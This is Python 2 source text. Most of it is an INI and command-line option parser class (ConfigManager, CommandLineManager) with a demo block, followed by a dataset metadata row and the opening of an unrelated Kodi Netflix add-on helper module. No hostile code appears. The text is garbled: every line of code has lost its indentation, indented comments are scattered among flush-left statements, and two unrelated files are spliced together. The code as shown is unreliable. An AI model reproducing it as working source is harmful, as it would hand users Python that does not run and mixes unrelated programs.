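    # Hedged sketch of how a category key is wired into an option (names and
    # option strings are illustrative, not from the original source):
    #
    #   debug = config.add_category('debugging', 'Debugging')
    #   logging = config.add_section('logging')
    #   logging['verbose'] = BooleanOption('Verbose output',
    #                                      options='--verbose -v',
    #                                      category=debug)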
def get_category(self, key):
""" Return the title of the given category """
if type(key) not in [list, tuple]:
key = [key]
if not key:
return ''
return self._categories[key[0]]
def categories(self):
""" Return the dictionary of categories """
return self._categories
def set_strict(self, bool=1):
"""
Parse the command line strictly
If you do not want to be bothered with errors due to unrecognized
arguments, this method can be called with a boolean 'false'.
This is very useful if your program is actually a wrapper around
another program and you do not want to declare all of its options
in your ConfigManager. The ConfigManager will simply make its best
guess as to whether the option accepts a value and what type the
option is.
Keyword Arguments:
bool -- flag indicating whether parsing should be strict or not
"""
self.strict = not(not(bool))
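    # Illustrative sketch (the flag name is hypothetical): with strict parsing
    # disabled, unknown command-line options no longer raise
    # UnrecognizedArgument; they are collected in self.unrecognized instead.
    #
    #   config.set_strict(0)
    #   opts, args = config.getopt(['--downstream-flag', 'value'])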
def defaults(self):
""" Return a dictionary of defaults """
return self[DEFAULTSECT]
def sections(self):
""" Return a list of section names """
return self.keys()
def add_section(self, section):
"""
Create a new section in the configuration.
Do nothing if a section by the specified name already exists.
Required Arguments:
section -- name of the section to create
Returns:
instance -- a ConfigSection instance with the given name is returned
"""
if self.has_key(section): return self[section]
self[section] = ConfigSection(section)
return self[section]
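    # Illustrative note (section name is hypothetical): add_section is
    # idempotent, so repeated calls hand back the same ConfigSection instance.
    #
    #   logging = config.add_section('logging')
    #   assert config.add_section('logging') is logging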
def has_section(self, section):
""" Indicate whether the named section is present """
return section in self.keys()
def options(self, section):
""" Return a list of option names for the given section name """
if self.has_key(section):
return self[section].keys()
else:
raise NoSectionError(section)
def read(self, filenames):
"""
Read and parse a filename or a list of filenames
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
"""
if type(filenames) in [type(''), type(u'')]:
filenames = [filenames]
for filename in filenames:
try:
if filename.startswith('~'):
filename = os.path.expanduser(filename)
fp = urllib.urlopen(filename)
except (OSError, IOError):
continue
self.__read(fp, filename)
fp.close()
return self
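    # Usage sketch for read() (file names are hypothetical): candidates are
    # read in the order given and files that cannot be opened are skipped.
    #
    #   config.read(['/etc/myapp.ini', '~/.myapprc', './myapp.ini'])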
def readfp(self, fp, filename=None):
"""
Like read() but the argument must be a file-like object.
The 'fp' argument must have a 'readline' method. Optional
second argument is the 'filename', which if not given, is
taken from fp.name. If fp has no 'name' attribute, '<???>' is
used.
Required Arguments:
fp -- file-type like object
filename -- name of the file in 'fp'
Returns:
string -- contents of the file pointer
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self.__read(fp, filename)
return self
def get(self, section, option, raw=0, vars={}):
""" Get an option value for a given section """
return self[section].get(option, raw, vars)
def set(self, section, option, value, source=BUILTIN):
""" Set an option value """
if not section or section == DEFAULTSECT:
sectdict = self[DEFAULTSECT]
else:
try:
sectdict = self[section]
except KeyError:
raise NoSectionError(section)
sectdict.set(option, value, source)
def __setitem__(self, key, value):
""" Add a section to the configuration """
if isinstance(value, ConfigSection):
self.data[key] = value
self.data[key].setParent(self)
else:
self.data[key] = ConfigSection(str(key))
self.data[key].setParent(self)
def __getitem__(self, key):
"""
Return section with given name
Return the section or if it's not a section try to
return an option by that name in the 'default' section.
"""
if self.data.has_key(key):
return self.data[key]
if self.data[DEFAULTSECT].has_key(key):
return self.data[DEFAULTSECT][key]
raise NoSectionError(key)
def getint(self, section, option):
""" Get an option value and cast it to an integer """
return self[section].getint(option)
def getfloat(self, section, option):
""" Get an option value and cast it to a float """
return self[section].getfloat(option)
def getboolean(self, section, option):
""" Get an option value and cast it to a boolean """
return self[section].get(option)
def getraw(self, section, option):
""" Get the raw (un-interpolated) value of an option """
return self[section].getraw(option)
def has_option(self, section, option):
""" Check for the existence of a given option in a given section """
if not section:
section=DEFAULTSECT
elif not self.has_key(section):
return 0
else:
return self[section].has_key(option)
def write(self, fp):
""" Write an INI-format representation of the configuration state """
fp.write(str(self))
def __str__(self):
""" Return an INI formated string with builtins removed """
return self.to_string()
def __repr__(self):
""" Return an INI formated string with builtins included """
return self.to_string(source=COMMANDLINE|CONFIGFILE|CODE|BUILTIN|REGISTRY|ENVIRONMENT)
def to_string(self, source=COMMANDLINE|CONFIGFILE):
"""
Build an INI formatted string based on the ConfigManager contents
Keyword Arguments:
        source -- flag indicating which sources of information to print
Returns:
string -- INI formatted string
"""
if source & BUILTIN: func = repr
else: func = str
s = ''
keys = [x for x in self.keys() if x != DEFAULTSECT]
keys.sort()
if self[DEFAULTSECT]:
keys.insert(0, DEFAULTSECT)
for section in keys:
content = func(self[section]).strip()
if content:
s += "[%s]\n%s\n\n" % (section, content)
return s
def remove_option(self, section, option):
""" Remove an option from a section """
if not section or section == DEFAULTSECT:
sectdict = self[DEFAULTSECT]
else:
try:
sectdict = self[section]
except KeyError:
raise NoSectionError(section)
try:
del sectdict[option]
return 1
except KeyError:
return 0
def remove_section(self, section):
""" Remove the given section """
if self.has_key(section):
del self[section]
return 1
else:
return 0
def __read(self, fp, fpname):
"""
Parse an INI formatted file
The sections in the file contain a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
        Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else is ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while 1:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split()[0].lower() == 'rem' \
and line[0] in "rR": # no leading whitespace
continue
# continuation line?
if line[0] in ' \t' and cursect is not None and optname:
value = line.strip()
if value and cursect.data[optname].source == CONFIGFILE:
cursect.data[optname] += "%s" % value
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if self.has_key(sectname):
cursect = self[sectname]
else:
cursect = ConfigSection(sectname)
self[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, `line`)
# an option line?
else:
mo = self.OPTCRE.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos and optval[pos-1] in string.whitespace:
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
try:
cursect.set(optname, optval, source=CONFIGFILE)
cursect.data[optname].file = fpname
except:
print "Problem occurred in section '%s' while reading file %s." % (cursect.name, fpname)
raise
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, `line`)
# if any parsing errors occurred, raise an exception
if e:
raise e
def get_default_option(self, option):
""" Get the given option from the default section """
try:
return self[DEFAULTSECT][option]
except KeyError:
raise NoOptionError(option, DEFAULTSECT)
def get_opt(self, section, option):
""" Return the option with leading and trailing quotes removed """
optionstring = self[section][option].strip()
if (optionstring[0] == '\'' and optionstring[-1] == '\'') or \
(optionstring[0] == '\"' and optionstring[-1] == '\"'):
optionstring = optionstring[1:-1]
return optionstring
def get_optlist(self, section, option, delim=','):
"""
Return the option split into a list
Required Arguments:
section -- name of the section
option -- name of the option
Keyword Arguments:
delim -- delimiter to use when splitting the option
Returns:
list -- option value split on 'delim' with whitespace trimmed
"""
optionstring = self.get_opt( section, option )
return [x.strip() for x in optionstring.split(delim)]
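    # Illustrative example (section, option and values are hypothetical):
    # an INI entry "names = alice, bob , carol" in section [users] yields
    #
    #   config.get_optlist('users', 'names')        # ['alice', 'bob', 'carol']
    #   config.get_optlist('users', 'names', ':')   # split on ':' instead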
def __add__(self, other):
"""
Merge items from another ConfigManager
Sections in 'other' will overwrite sections in 'self'.
"""
other = other.copy()
for key, value in other.items():
self[key] = value
try:
for key, value in other._categories.items():
self._categories[key] = value
except AttributeError: pass
return self
def __iadd__(self, other):
""" Merge items from another ConfigManager """
return self.__add__(other)
def __radd__(self, other):
"""
Merge items from another ConfigManager
Sections already in 'self' will not be overwritten.
"""
other = other.copy()
for key, value in other.items():
if not self.has_key(key):
self[key] = value
try:
            for key, value in other._categories.items():
if not self._categories.has_key(key):
self._categories[key] = value
except AttributeError: pass
return self
def get_options_from_config(self):
"""
Locate all short and long options
Returns:
tuple -- two element tuple contain a list of short option
instances and a list of long option instances
"""
short_prefixes, long_prefixes = type(self).get_prefixes()
longopts = []
shortopts = []
for section in self.values():
for option in section.data.values():
for opt in option.getPossibleOptions():
opt = opt.replace('!','')
# See if the option is a long option
for prefix in long_prefixes:
if prefix is None:
pass
elif not prefix.strip():
pass
elif opt.startswith(prefix):
if option not in longopts:
longopts.append(option)
continue
# See if the option is a short option
for prefix in short_prefixes:
if prefix is None:
pass
elif not prefix.strip():
pass
elif opt.startswith(prefix):
if option not in shortopts:
shortopts.append(option)
return shortopts, longopts
def getopt(self, args=None, merge=1):
"""
Parse the command line
Keyword Arguments:
args -- list of strings containing the command line. If this is
not given, sys.argv[1:] is used.
merge -- boolean flag indicating whether parsed options should
be merged into the configuration or not
Returns:
tuple -- two element tuple where the first element is a list of
parsed options in the form '(option, value)' and the second
element is a list of unparsed arguments
"""
if args is None: args = sys.argv[1:]
shortopts, longopts = self.get_options_from_config()
short_prefixes, long_prefixes = type(self).get_prefixes()
opts = []
while args and args[0] not in short_prefixes:
# If the argument is equal to one of the long prefixes,
# throw it away and bail out.
if args[0] in long_prefixes:
args = args[1:]
break
# Parse long options
if [x for x in long_prefixes if args[0].startswith(x)]:
try:
opts, args = self.do_longs(opts,args[0],longopts,args[1:])
except UnrecognizedArgument, e:
if self.strict: raise
opts, args = self.handle_unrecognized(e[1],opts,args,'long')
if merge: self.unrecognized.append(opts[-1])
# Parse short options
elif [x for x in short_prefixes if args[0].startswith(x)]:
try:
opts, args = self.do_shorts(opts,args[0],shortopts,args[1:])
except UnrecognizedArgument, e:
if self.strict: raise
opts, args = self.handle_unrecognized(e[1],opts,args,'short')
if merge: self.unrecognized.append(opts[-1])
# No option found. We're done.
else: break
# Merge command line options with configuration
if merge:
self.merge_options(opts)
self.check_mandatory_options()
return opts, args
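    # Command-line parsing sketch (argument values are made up and assume a
    # '--warning' option has been declared, as in the demo block at the bottom
    # of this module). Parsed values are merged back into the manager.
    #
    #   opts, args = config.getopt(['--warning', '5', 'input.txt'])
    #   # opts pairs option instances with their parsed values,
    #   # args keeps the leftover positional arguments (['input.txt'])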
def check_mandatory_options(self):
"""
Make sure that all mandatory options have been set
"""
for section in self.values():
for option in section.values():
if not option.mandatory: continue
if option.getValue() in [None,[]]:
names = ', '.join(option.getPossibleOptions())
if not names:
names = option.name
raise MandatoryOption, ('The %s option is mandatory, but was not given' % names, names)
def handle_unrecognized(self, option, opts, args, type='long'):
"""
Try to parse unrecognized options and their arguments
Required Arguments:
option -- the actual option parsed from the command-line
which was not recognized
opts -- tuples of already parsed options and their values
args -- remaining unparsed command-line arguments
Keyword Arguments:
type -- flag indicating which type of argument to parse.
This should be either "short" or "long".
"""
if type == 'long':
args.pop(0)
# Explicitly specified value
if option.find('=') + 1:
option, value = option.split('=',1)
opts.append((option, value))
return opts, args
# Implicitly specified value
if self.has_following_argument(args):
opts.append((option, args.pop(0)))
return opts, args
# No argument found
opts.append((option, None))
return opts, args
elif type == 'short':
short_prefixes, long_prefixes = self.get_prefixes()
prefix = [x for x in short_prefixes if option.startswith(x)][0]
start, end = args[0].split(option.replace(prefix,'',1),1)
if end: args[0] = prefix + end
else: args.pop(0)
opts.append((option, ''))
return opts, args
raise ValueError, 'Expecting type of "short" or "long".'
def merge_options(self, options):
""" Merge options parsed from the command line into configuration """
from Generic import GenericOption
from Multi import MultiOption
# Multi options that have been cleared by a command line option.
# Lists will only be cleared on the first command line option, all
# consecutive options will append.
for option, value in options:
# opts = self.getPossibleOptions()
# negative = [x.replace('!','',1) for x in opts if x.startswith('!')]
# positive = [x for x in opts if not x.startswith('!')]
if isinstance(option, GenericOption):
option.source = COMMANDLINE
option.file = None
if type(value) in [list, tuple]:
if not isinstance(option, MultiOption):
value = ' '.join(value)
option.occurrences += 1
option.setValue(value)
else:
if option.occurrences:
option.occurrences += 1
option += value
else:
option.occurrences += 1
option.setValue(value)
else:
option.occurrences += 1
option.setValue(value)
def get_prefixes(cls):
""" Prepare option prefixes to make sure that they are always lists """
long_prefixes = cls.long_prefix
short_prefixes = cls.short_prefix
if type(long_prefixes) not in [list, tuple]:
long_prefixes = [long_prefixes]
if type(short_prefixes) not in [list, tuple]:
short_prefixes = [short_prefixes]
return [x for x in short_prefixes if x],[x for x in long_prefixes if x]
get_prefixes = classmethod(get_prefixes)
def do_longs(self, opts, opt, longopts, args):
"""
Parse a long option
Required Arguments:
opts -- list of parsed options
opt -- string containing current option
longopts -- list of long option instances
args -- remaining argument list
Returns:
tuple -- two element tuple where the first argument is the
'opts' list with the latest argument added and the second
element is the 'args' list with the arguments from the
current option removed
"""
forcedarg = False
if opt.find('=') + 1:
forcedarg = True
opt, arg = opt.split('=', 1)
args.insert(0, arg)
option = self.get_match(opt, longopts)
option.actual = opt
option.file = None
# If we have an argument, but the option doesn't accept one, bail out.
if forcedarg and not(option.acceptsArgument()):
raise UnspecifiedArgument('option %s must not have an argument' \
% opt, opt)
elif forcedarg:
optarg, args = option.getArgument(args, forcedarg=True)
elif not(option.acceptsArgument()):
pass
# Parse the following arguments
else:
# See if we have a possible following argument
if not type(self).has_following_argument(args):
# No argument found, but we require one.
if option.requiresArgument():
raise RequiresArgument('option %s requires argument' \
% opt, opt)
# Parse the argument
optarg, args = option.getArgument(args)
# Convert boolean options to proper value
if not forcedarg and isinstance(option, BooleanOption):
options = option.getPossibleOptions()
negative = [x.replace('!','',1) for x in options
if x.startswith('!')]
# positive = [x for x in options if not x.startswith('!')]
if opt in negative:
optarg = 0
else:
optarg = 1
opts.append((option, optarg))
return opts, args
def has_following_argument(cls, args):
"""
Return boolean indicating the existence of a following argument
Required Arguments:
args -- command-line arguments to inspect for following argument.
Returns:
boolean -- true, if following argument exists
"""
short_prefixes, long_prefixes = cls.get_prefixes()
# No arguments at all
if not(args):
return 0
# The next argument has an option prefix and it doesn't consist
# entirely of a prefix.
if [x for x in long_prefixes+short_prefixes if args[0].startswith(x)] \
and args[0] not in long_prefixes+short_prefixes:
return 0
# All other cases fail. This must be an argument.
return 1
has_following_argument = classmethod(has_following_argument)
def get_match(self, opt, longopts):
"""
Get possible matches for the given option
Required Arguments:
opt -- name of the current option
longopts -- list of all long option instances
Returns:
instance -- an instance of the option which matches
"""
possibilities = []
for o in longopts:
match = o.matches(opt)
if match:
possibilities.append((match, o))
if not possibilities:
raise UnrecognizedArgument('option %s not recognized' % opt, opt)
# Is there an exact match?
option = [x for x in possibilities if opt == x[0]]
if option:
return option[0][1]
# No exact match, so better be unique.
if len(possibilities) > 1:
# XXX since possibilities contains all valid continuations,
# might be nice to work them into the error msg
raise NonUniquePrefix('option %s not a unique prefix' % opt, opt)
assert len(possibilities) == 1
return possibilities[0][1]
def do_shorts(self, opts, optstring, shortopts, args):
"""
Parse a short argument
Required Arguments:
opts -- list of parsed options
optstring -- string containing current option
shortopts -- list of short option instances
args -- remaining argument list
Returns:
tuple -- two element tuple where the first argument is the
'opts' list with the latest argument added and the second
element is the 'args' list with the arguments from the
current option removed
"""
short_prefixes, long_prefixes = type(self).get_prefixes()
        optstring = optstring.strip()
if not optstring:
return [], args
prefix = optstring[0]
optstring = optstring[1:]
while optstring != '':
opt, optstring = optstring[0], optstring[1:]
option = self.get_match(prefix+opt, shortopts)
option.actual = prefix+opt
option.file = None
# See if we need to check for an argument
if option.acceptsArgument():
if optstring == '':
# Are there any following arguments?
if not type(self).has_following_argument(args):
# No argument found, but we require one.
if option.requiresArgument():
raise RequiresArgument('option %s requires argument' \
% opt, opt)
optarg, args = option.getArgument(args)
else:
optarg, args = option.getArgument([optstring]+args)
# No argument was found
if args and args[0] == optstring:
optarg = None
optstring = args.pop(0)
else:
optstring = ''
else:
optarg = None
# Convert boolean options to proper value
if optarg is None and isinstance(option, BooleanOption):
options = option.getPossibleOptions()
negative = [x.replace('!','',1) for x in options
if x.startswith('!')]
# positive = [x for x in options if not x.startswith('!')]
if prefix+opt in negative:
optarg = 0
else:
optarg = 1
opts.append((option, optarg))
return opts, args
def usage_on(self, options):
"""
Print full help for listed options and exit
Required Arguments:
options -- list of strings indicating which options to list
help on (preceding '-' and '--' should be removed)
"""
display = []
for sectkey, section in self.items():
for optkey, option in section.items():
if option.long in options or option.short in options:
display.append((sectkey, optkey, option))
display.reverse()
err = sys.stderr.write
while display:
sectkey, optkey, opt = display.pop()
err('Command Line: %s\n' % self._option_usage(opt))
err('Configuration File: [%s] %s=\n' % (sectkey, optkey))
current = opt.names()['current']
if current != None: err('Current Value: %s\n\n' % current)
else: err('\n')
err('%s\n\n' % opt.description)
if display: err('\n')
sys.exit(1)
def _option_usage(self, option):
""" Return the option the way it can be typed at the command line """
if option.options.strip():
short_prefixes, long_prefixes = self.get_prefixes()
prefixes = long_prefixes + short_prefixes
options = re.sub(r'\s+', r' ', option.options.replace('!',''))
options = options.split()
options = [(len(x),x) for x in options
if [x for p in prefixes if x.startswith(p)]]
options.sort()
options = [x[1] for x in options]
# Determine argument separator
sep = ' '
loptions = [x for x in options
if [x for p in long_prefixes if x.startswith(p)]]
if loptions:
sep = '='
options = ', '.join(options)
if option.acceptsArgument() and option.requiresArgument():
return '%s%s%s' % (options, sep, option.synopsis)
elif option.acceptsArgument():
return '%s[%s%s]' % (options, sep, option.synopsis)
else:
return options
return ''
def usage(self, categories=[]):
""" Print descriptions of all command line options """
categories = categories[:]
options = []
for section in self.values():
for option in section.data.values():
if option.options:
options.append(option)
options.sort()
if not options: return ''
name_len = 0
summary_len = 0
# Put options into categories
categorized = {}
for option in options:
catname = self.get_category(option.category).strip()
name = self._option_usage(option)
summary = ''
if option.summary:
summary = option.summary % option.names()
default = option.defaultValue()
if default is not None:
summary += ' [%s]' % default
if not categorized.has_key(catname):
categorized[catname] = []
categorized[catname].append((name,summary,option))
if summary:
name_len = max(name_len,len(name))
summary_len = max(summary_len,len(summary))
name_len = min(name_len, int(TERMINAL_WIDTH*MAX_NAME_WIDTH_RATIO))
summary_len = TERMINAL_WIDTH - PREPAD - GUTTER - name_len
# Build the output string
s = ''
if categories:
categories = [self.get_category(x) for x in categories]
else:
categories = categorized.keys()
categories.sort()
for category in categories:
options = categorized[category]
if not category:
if len(categories) > 1:
category = 'General Options'
else:
category = 'Options'
s += '\n%s:\n' % category
for name, summary, option in options:
length = len(name)
summary = wrap(summary, summary_len)
summary = ('\n%s' % (' '*(PREPAD+name_len+GUTTER))).join(summary)
# Be lenient on the gutter if we are really close to
# fitting in the allocated space
format = '%s%s%s%s\n'
colspace = max(GUTTER + name_len - length, GUTTER)
if summary and ((name_len + GUTTER) > length):
colspace = (name_len + GUTTER) - length
elif summary and length > name_len:
colspace = PREPAD + name_len + GUTTER
format = '%s%s\n%s%s\n'
s += format % (' '*PREPAD, name, ' '*colspace, summary)
return s
class CommandLineManager(ordereddict):
""" Command-Line Argument Manager """
def __init__(self, data={}):
ordereddict.__init__(self, data)
self._associations = {}
def usage(self):
s = ''
for item in self.values():
if isinstance(item, ConfigManager):
s += item.usage()
else:
break
return s
def requiresArgument(self):
""" Return boolean indicating if config requires an argument """
if not self: return 0
for key in self:
item = ordereddict.__getitem__(self, key)
if isinstance(item, GenericArgument):
if item.mandatory:
return 1
def getopt(self, args=None):
if args == None:
args = sys.argv[1:]
else:
args = args[:]
if not self: return self
for key in self:
item = ordereddict.__getitem__(self, key)
association = self._associations.get(key, None)
if isinstance(item, ConfigManager):
if association:
item.read(association)
options, args = item.getopt(args)
elif isinstance(item, GenericArgument):
value, args = item.getArgument(args)
item.setValue(value)
else:
raise ValueError, "Unrecognized argument type."
if len(args):
raise TooManyValues, \
'Too many command-line arguments: %s' % ' '.join(args)
return self
def __setitem__(self, key, value):
item = value
if type(value) in [types.TupleType, types.ListType]:
value = list(value)
item = value.pop(0)
self._associations[key] = value
assert isinstance(item, ConfigManager) or \
isinstance(item, GenericArgument), \
'Command-line parameters must be ConfigManagers or ' + \
'subclasses of GenericArgument'
if hasattr(item, 'name') and item.name is None:
item.name = key
ordereddict.__setitem__(self, key, item)
def __getitem__(self, key):
if type(key) == types.SliceType:
return self.__getslice__(key.start, key.stop)
item = ordereddict.__getitem__(self, key)
if isinstance(item, ConfigManager):
return item
else:
return item.getValue()
# These must be loaded last because they depend on variables
# assigned in this file.
from Generic import GenericOption, GenericArgument
from String import StringOption, StringArgument
from Integer import IntegerOption, IntegerArgument
from Float import FloatOption, FloatArgument
from Multi import MultiOption, MultiArgument
from Compound import CompoundOption, CompoundArgument
from Boolean import BooleanOption, BooleanArgument
from Files import OutputFileOption, InputFileOption
from Directories import OutputDirectoryOption, InputDirectoryOption
from Files import OutputFileArgument, InputFileArgument
from Directories import OutputDirectoryArgument, InputDirectoryArgument
from Counted import CountedOption, CountedArgument
if __name__ == '__main__':
# Instantiate a new option parser
op = ConfigManager()
op.set_strict(FALSE)
# Set option prefixes for short and long options. If the short
# prefix is set to None, all options will act like long options.
ConfigManager.short_prefix = '-'
ConfigManager.long_prefix = '--'
debugging = op.add_category('debugging','Debugging')
# Create a new section
logging = op.add_section('logging')
logging['compare'] = MultiOption(
options = '--compare',
range = [0,2],
delim = ',',
environ = 'COMPARE',
# mandatory = 1,
template = FloatOption,
)
logging['testopts'] = CompoundOption(
options = '--testopts',
environ = 'TESTOPTS',
)
logging['verbose'] = BooleanOption(
options = '--verbose -v !-q !--quiet',
environ = 'VERBOSE',
default = 0,
category = 'debugging',
)
# Explicitly specify an integer option
logging['debug'] = CountedOption(
'''
Set the debugging level
This option sets the verbosity of debugging messages.
''',
options = '--debug -d !-u',
default = 0,
environ = 'DEBUG',
category = 'debugging',
)
# Explicitly specify another integer option
logging['warning'] = IntegerOption(
'''
Set the warning level
This option sets the verbosity of warning messages.
Valid Values:
The warning level must be an integer between 0 and 10.
''',
options = '--warning -w',
values = [0,10],
default = 1
)
# Implicitly declare a float option
logging['log'] = 1.2
# Implicitly declare a float option
logging['note'] = 2
files = op.add_section('files')
files['output-file'] = OutputFileOption(
''' Where the results will go. This is the output file that will contain your output ''',
options = '--output-file -o',
synopsis = 'OUTPUT-FILENAME',
)
files['input-file'] = InputFileOption(
''' Where the input will come from ''',
options = '--input-file -i',
)
files['input-dir'] = InputDirectoryOption(
''' Where the input will come from ''',
options = '--input-dir -I',
)
files['output-dir'] = OutputDirectoryOption(
        ''' Where the output will go. This must be a directory or it won\'t work ''',
options = '--output-dir -D',
)
# Read in configuration files
#op.read('/home/username/.myconfrc')
op.read('./testconfig')
# Call the option parser to parse the command line
opts, args = op()
# Print out current information
print
print '-- Parsed Options --'
print
# print opts
# print args
# print op['logging']['debug'], op.data['logging'].data['debug'].file
# print op['logging']['compare'], op.data['logging'].data['compare'].file
for option, value in opts:
# Option was recognized
if isinstance(option, GenericOption):
print '%s.%s: %s' % (option.parent.name, option.name, value)
# Unrecognized options
else:
print '(unknown) %s: %s' % (option, value)
print
# Print unrecognized options
print '-- Unrecognized options --'
print
print op.unrecognized
print
# Print remaining unparsed arguments
print '-- Remaining Arguments --'
print
print args
print
sources = \
[('Command-Line Options', COMMANDLINE),
('Config File Options', CONFIGFILE),
('Environment Options', ENVIRONMENT),
('Builtin Options', BUILTIN)]
for title, bit in sources:
print '-- %s --' % title
print
for section in op.values():
for option in section.values():
if option.source & bit:
print '%s.%s: %s' % (section.name, option.name, option.getValue())
print
# Print out a usage message
print '-- Usage --'
print
print op.usage()
print
# Print out a usage message for one category
print '-- Single Category Usage --'
print
print op.usage(['debugging'])
print
# Print out an INI representation of the current settings
print '-- Current Configuration --'
print
print repr(op)
print '-- Command-Line Manager --'
print
outputfile = StringArgument("Output File", name='foo', values=('add','subtract','multiply','divide'))
number = IntegerArgument("Number of times to iterate", name='bar')
clm = CommandLineManager(op, outputfile, number)
print clm()
for item in clm:
print '%s: %s' % (type(item), item)
| mit | -2,288,027,374,097,825,300 | 32.894766 | 116 | 0.556989 | false |
mrquim/repository.mrquim | repo/plugin.video.netflix/resources/lib/KodiHelper.py | 4 | 56995 | # pylint: skip-file
# -*- coding: utf-8 -*-
# Module: KodiHelper
# Created on: 13.01.2017
import re
import json
import base64
import hashlib
from os import remove
from uuid import uuid4
from urllib import urlencode
import AddonSignals
import xbmc
import xbmcgui
import xbmcplugin
import inputstreamhelper
from resources.lib.ui.Dialogs import Dialogs
from resources.lib.NetflixCommon import Signals
from utils import get_user_agent
from UniversalAnalytics import Tracker
try:
import cPickle as pickle
except:
import pickle
try:
# Python 2.6-2.7
from HTMLParser import HTMLParser
except ImportError:
# Python 3
from html.parser import HTMLParser
VIEW_FOLDER = 'folder'
VIEW_MOVIE = 'movie'
VIEW_SHOW = 'show'
VIEW_SEASON = 'season'
VIEW_EPISODE = 'episode'
VIEW_EXPORTED = 'exported'
CONTENT_FOLDER = 'files'
CONTENT_MOVIE = 'movies'
CONTENT_SHOW = 'tvshows'
CONTENT_SEASON = 'seasons'
CONTENT_EPISODE = 'episodes'
def _update_if_present(source_dict, source_att, target_dict, target_att):
if source_dict.get(source_att):
target_dict.update({target_att: source_dict[source_att]})
class KodiHelper(object):
"""
    Consumes all the configuration data from Kodi and turns it into
    lists of folders and videos"""
def __init__(self, nx_common, library):
"""
Provides helpers for addon side (not service side)
"""
self.nx_common = nx_common
self.plugin_handle = nx_common.plugin_handle
self.base_url = nx_common.base_url
self.library = library
self.custom_export_name = nx_common.get_setting('customexportname')
self.show_update_db = nx_common.get_setting('show_update_db')
self.default_fanart = nx_common.get_addon_info('fanart')
self.setup_memcache()
self.dialogs = Dialogs(
get_local_string=self.get_local_string,
custom_export_name=self.custom_export_name)
self._context_menu_actions = None
def refresh(self):
"""Refresh the current list"""
return xbmc.executebuiltin('Container.Refresh')
def toggle_adult_pin(self):
"""Toggles the adult pin setting"""
adultpin_enabled = False
raw_adultpin_enabled = self.nx_common.get_setting('adultpin_enable')
if raw_adultpin_enabled == 'true' or raw_adultpin_enabled == 'True':
adultpin_enabled = True
if adultpin_enabled is False:
return self.nx_common.set_setting('adultpin_enable', 'True')
return self.nx_common.set_setting('adultpin_enable', 'False')
def set_main_menu_selection(self, type):
"""Persist the chosen main menu entry in memory
Parameters
----------
type : :obj:`str`
Selected menu item
"""
current_window = xbmcgui.getCurrentWindowId()
xbmcgui.Window(current_window).setProperty('main_menu_selection', type)
def get_main_menu_selection(self):
"""Gets the persisted chosen main menu entry from memory
Returns
-------
:obj:`str`
The last chosen main menu entry
"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
return window.getProperty('main_menu_selection')
def setup_memcache(self):
"""Sets up the memory cache if not existant"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = window.getProperty('memcache')
# no cache setup yet, create one
if len(cached_items) < 1:
window.setProperty('memcache', pickle.dumps({}))
except EOFError:
pass
def invalidate_memcache(self):
"""Invalidates the memory cache"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
window.setProperty('memcache', pickle.dumps({}))
except EOFError:
pass
def get_cached_item(self, cache_id):
"""Returns an item from the in memory cache
Parameters
----------
cache_id : :obj:`str`
ID of the cache entry
Returns
-------
mixed
Contents of the requested cache item or none
"""
ret = None
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = pickle.loads(window.getProperty('memcache'))
ret = cached_items.get(cache_id)
except EOFError:
ret = None
return ret
def add_cached_item(self, cache_id, contents):
"""Adds an item to the in memory cache
Parameters
----------
cache_id : :obj:`str`
ID of the cache entry
contents : mixed
Cache entry contents
"""
current_window = xbmcgui.getCurrentWindowId()
window = xbmcgui.Window(current_window)
try:
cached_items = pickle.loads(window.getProperty('memcache'))
cached_items.update({cache_id: contents})
window.setProperty('memcache', pickle.dumps(cached_items))
except EOFError:
pass
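    # Illustrative sketch of the window-property cache implemented by
    # get_cached_item/add_cached_item (the cache id and payload are
    # hypothetical). Entries are pickled into a single 'memcache' window
    # property and live as long as the current Kodi window.
    #
    #   helper.add_cached_item('video_list_123', {'items': []})
    #   cached = helper.get_cached_item('video_list_123')  # None on a miss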
def set_custom_view(self, content):
"""Set the view mode
Parameters
----------
content : :obj:`str`
Type of content in container
(folder, movie, show, season, episode, login, exported)
"""
custom_view = self.nx_common.get_setting('customview')
if custom_view == 'true':
view = int(self.nx_common.get_setting('viewmode' + content))
if view != -1:
xbmc.executebuiltin('Container.SetViewMode(%s)' % view)
def save_autologin_data(self, autologin_user, autologin_id):
"""Write autologin data to settings
Parameters
----------
autologin_user : :obj:`str`
Profile name from netflix
autologin_id : :obj:`str`
Profile id from netflix
"""
self.nx_common.set_setting('autologin_user', autologin_user)
self.nx_common.set_setting('autologin_id', autologin_id)
self.nx_common.set_setting('autologin_enable', 'True')
self.dialogs.show_autologin_enabled_notify()
self.invalidate_memcache()
self.refresh()
def build_profiles_listing(self, profiles, action, build_url):
"""
Builds the profiles list Kodi screen
:param profiles: list of user profiles
:type profiles: list
        :param action: action parameter to build the subsequent routes
:type action: str
:param build_url: function to build the subsequent routes
:type build_url: fn
        :returns: bool -- List could be built
"""
# init html parser for entity decoding
html_parser = HTMLParser()
# build menu items for every profile
